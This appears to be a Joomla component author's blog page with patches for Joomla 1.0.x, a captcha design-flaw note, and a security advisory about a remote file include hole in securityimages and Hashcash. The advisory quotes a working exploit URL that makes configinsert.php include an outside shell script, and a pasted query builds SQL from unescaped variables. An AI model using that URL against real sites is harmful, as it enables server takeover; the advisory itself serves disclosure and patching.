bug


  • To solve any problems with securityimages and the admin sessions (a bug in Joomla 1.0.13): this patch stops you from being kicked out of the admin area on every other link.
    You'll have to upload these files with FTP/SCP and overwrite the existing Joomla! 1.0.13 files!
    BUG: Patches for Joomla 1.0.13 that include the admin session fixes? Thanks to the users in my forum.


    Download JoomlaPatches for Joomla 1.0.13 for securityimages 4.x only

  • To solve the following issue in Joomla 1.0.9:

    Warning: Invalid argument supplied for foreach() in /var/www/vhosts/waltercedric.com/httpdocs/includes/frontend.php on line 85

    Edit the file includes/frontend.php; this is the correct code:

    /**
    * Cache some modules information
    * @return array
    */
    function &initModules() {
        global $database, $my, $Itemid;

        if (!isset( $GLOBALS['_MOS_MODULES'] )) {
            // #__ is replaced with the configured table prefix by setQuery().
            // The quoted $my->gid and $Itemid values are the lines that changed.
            $query = "SELECT id, title, module, position, content, showtitle, params"
            . "\n FROM #__modules AS m"
            . "\n INNER JOIN #__modules_menu AS mm ON mm.moduleid = m.id"
            . "\n WHERE m.published = 1"
            . "\n AND m.access <= '". $my->gid ."'"
            . "\n AND m.client_id != 1"
            . "\n AND ( mm.menuid = '".$Itemid."' OR mm.menuid = 0 )"
            . "\n ORDER BY ordering";

            $database->setQuery( $query );
            $modules = $database->loadObjectList();
            // Group the published modules by template position.
            foreach ($modules as $module) {
                $GLOBALS['_MOS_MODULES'][$module->position][] = $module;
            }
        }
        return $GLOBALS['_MOS_MODULES'];
    }
    What has changed in that method (extract, highlighted in yellow in the original):
    . "\n AND m.access <= '".$my->gid ."'"
    and
    . "\n AND ( mm.menuid = '".$Itemid."' OR mm.menuid = 0 )"



    All credit goes to user Mathinka (JoomlaPortal.de)


  • The webmaster of janwiersma.com sent me an email today at 6:12 AM: his server was hacked because of a bug in securityimages. This bug allows a remote attacker to execute commands on your server via a forced remote include, and it affects ALL versions of securityimages <= 3.0.5.

    Here are all the files which put your server at risk:
    client.php, configinsert.php, lang.php, server.php

    Example of attack:
    http://web/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://shell.txt
    (from http://securityreason.com/exploitalert/892)
    Secunia also has a report on it: http://secunia.com/product/11186/
    In fact, I forgot to use this line in these files:
    defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');
    This line blocks any request that accesses the file directly: Joomla's entry point defines _VALID_MOS, so the constant is missing when the file is requested on its own.

    - upgrade to 3.0.6 (download at Joomla Forge or in my download sections) OR
    - patch the faulty files by hand (add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); at the beginning of each file)

    Please also contact all your friends who are using securityimages!

    And for my other components?

    Hashcash 1.2.X is also affected: http://secunia.com/product/11046/ and my patch is available!

    - upgrade to 1.2.2 (download at Joomla Forge or in my download sections) OR
    - patch the faulty files by hand (add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); at the beginning of each file)

    JoomlaCloud is NOT affected





    YOU ARE ALL URGED TO UPGRADE ASAP!
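
To check the "patch by hand" step above, the following added example (not code from securityimages or Hashcash) lists the .php files under a directory whose first statement is not the _VALID_MOS guard, including files where the guard only appears after other code. The function names and the sample file contents are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Guard line quoted in the post; tolerate spacing and quote-style differences.
GUARD = re.compile(r"defined\s*\(\s*['\"]_VALID_MOS['\"]\s*\)\s*or\s+die\s*\(", re.I)
# Whitespace and comments are the only things allowed before the guard.
SKIP = re.compile(r"\s+|/\*.*?\*/|//[^\n]*|#[^\n]*", re.S)

def has_leading_guard(source: str) -> bool:
    """True when the first statement after the PHP open tag is the guard."""
    tag = re.match(r"\s*<\?(?:php)?", source, re.I)
    if not tag:
        return False  # no opening tag at the top: treat as unguarded
    pos = tag.end()
    while (skipped := SKIP.match(source, pos)):
        pos = skipped.end()
    return GUARD.match(source, pos) is not None

def unguarded_files(root) -> list:
    """Sorted relative paths of .php files under root that lack the guard."""
    root = Path(root)
    return sorted(
        p.relative_to(root).as_posix()
        for p in root.rglob("*.php")
        if not has_leading_guard(p.read_text(errors="replace"))
    )

def demo() -> list:
    guard = "defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');\n"
    include = "require_once($mosConfig_absolute_path . '/constructed.php');\n"
    samples = {  # constructed file contents, not the component's real sources
        "server.php": "<?php\n/* header */\n" + guard + include,  # patched
        "configinsert.php": "<?php\n" + include,                   # guard missing
        "lang.php": "<?php\n" + include + guard,                   # guard too late
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in samples.items():
            Path(tmp, name).write_text(body)
        return unguarded_files(tmp)

if __name__ == "__main__":
    print(demo())
```

Point unguarded_files() at the component directory after patching; an empty list means every file starts with the guard.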

  • I'm now getting many emails and bug reports about security images 3.0.4. After looking closely at the source code and trying to reproduce those problems, I finally found the bug.
    In fact, this component is now a victim of its own success: using it everywhere has also revealed a serious design flaw, but let me explain...
    Security Images uses 2 hidden fields in the background:
    • Security_try, which contains the text entered by the user
    • Security_refid, which contains a UUID that will be used or not (depending on the plugin) to locate the private key in the database or session.
    These hidden field names are spread throughout the code, which lets the horror scenario happen:
    if you have several securityimages (captcha images) generated in the same page, for example one in the login module and one in the guestbook, the code won't work!

    The browser will submit all hidden fields which are in the form, and thus the first input text box (Security_try) may overwrite what the user has entered in another one... always rejecting the user as a result.
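
The collision described above, as an added example that is not code from securityimages: two captcha widgets share the names Security_try and Security_refid in one form, and PHP keeps only the last value submitted for a repeated plain field name. The challenge store, the field order and the per-instance suffix used for the corrected variant are assumptions made for illustration.

```python
from urllib.parse import parse_qsl, urlencode

# Constructed challenge store: refid (UUID stand-in) -> text shown in the image.
STORE = {"uuid-login": "P4RM", "uuid-guestbook": "K7QX"}

def php_post(body: str) -> dict:
    """Collapse a urlencoded body the way PHP fills $_POST for plain
    (non-array) field names: a repeated name keeps only the last value."""
    return dict(parse_qsl(body, keep_blank_values=True))

def widget_fields(instance: str, refid: str, typed: str, namespaced: bool) -> list:
    """Fields emitted by one captcha widget on the page."""
    suffix = f"_{instance}" if namespaced else ""  # hypothetical naming scheme
    return [("Security_refid" + suffix, refid), ("Security_try" + suffix, typed)]

def submit(namespaced: bool) -> str:
    """One form holding two widgets; the visitor only solves the guestbook one."""
    pairs = widget_fields("guestbook", "uuid-guestbook", "K7QX", namespaced)
    pairs += widget_fields("login", "uuid-login", "", namespaced)
    return urlencode(pairs)

def verify(post: dict, instance: str = "") -> bool:
    """Check the typed text against the challenge the refid points to."""
    suffix = f"_{instance}" if instance else ""
    typed = post.get("Security_try" + suffix, "")
    expected = STORE.get(post.get("Security_refid" + suffix))
    return bool(typed) and typed == expected

def demo() -> dict:
    shared = php_post(submit(namespaced=False))
    separate = php_post(submit(namespaced=True))
    return {
        "shared_post": shared,                      # guestbook answer is gone
        "shared_ok": verify(shared),                # correct answer rejected
        "namespaced_ok": verify(separate, "guestbook"),
    }

if __name__ == "__main__":
    print(demo())
```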

    Solutions
    1. Prio 1: the framework has to be configurable from the outside.
    2. Prio 1: free porn attack countermeasures will be added to the HNCaptcha plugin.

    Release
    3.0.5 (Patch)
    • Free porn attack countermeasures will be added to the HNCaptcha plugin.
    4.0.0 will have incompatible API changes
    You will have to change some 3rd party components, but I will support the following 3rd party components:
    • com_contact(Joomla core)
    • com_login (Joomla core)
    • com_registration (Joomla core)
    • akobookPlus
    • akoCommenPlus
    Others, like Community Builder, Galleries and JoomlaBoard, will have to be supported by their own authors. Please contact them about that issue; I will document how to use the 4.0 in my wiki.

    Other new functionalities will be added to the 4.0 releases soon. (You can submit your ideas here)

    Since it is raining over there :-( , it is realistic to see version 4.0.0 before Monday 29.05.2006

    AkobookPlus new language files:



  • You will for sure make a loooooooong trip with Microsoft, but do we really have to? See the bug found at mappoint.msn.com

    The Register is now relaying the news here

    1. Click here:  http://mappoint.msn.com/DirectionsFind.aspx
    2. Then change the "Address In" box to Norway
    3. In the first "City" box enter: haugesund
    4. Change the End "Address In" box to Norway
    5. In the "City" box enter: trondheim
    6. Click "Get Directions"